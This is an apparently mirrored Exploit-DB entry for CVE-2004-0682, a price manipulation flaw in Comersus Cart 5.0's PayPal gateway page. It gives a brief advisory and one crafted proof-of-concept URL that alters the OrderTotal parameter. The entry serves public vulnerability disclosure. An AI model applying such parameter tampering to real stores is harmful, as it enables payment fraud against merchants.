- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 24260
- Проверка EDB
-
- Пройдено
- Автор
- THOMAS RYAN
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2004-0682
- Дата публикации
- 2004-07-07
Comersus Open Technologies Comersus 5.0 - 'comersus_gatewayPayPal.asp' Price Manipulation
Код:
source: https://www.securityfocus.com/bid/10674/info
Comersus Cart is reported prone to multiple vulnerabilities. These issues may allow a remote attacker to carry out cross-site scripting attacks and manipulate parameters to change the price of an order.
Comersus Cart version 5.09 is affected by these issues, however, other versions may be prone to these vulnerabilities as well.
http://www.example.com/comersus/store/comersus_gatewayPayPal.asp?idOrder=2002&OrderTotal=|102|222|228|22|130|36|209&name=Thomas&lastName=Ryan&address=123+Easy+Modify+Street&city=New+York&state=NY&zip=10001&country=US&phone=212%2D857%2D1731&email=tommy%40providesecurity%2Ecom&orderDetails=1x+%23RDHT%2F11+Red+Hat+Deluxe+WorkStation+Options%3A+%3D+%2479%2E00%0D%0A2x+%23WME%2F1+Windows+Millennium+Edition+Options%3A+%3D+%24398%2E00%0D%0A1x+%23BPRES2%2F6+So+You+Want+to+Be+President%3F+Options%3A+%3D+%2414%2E39%0D%0A- Источник
- www.exploit-db.com
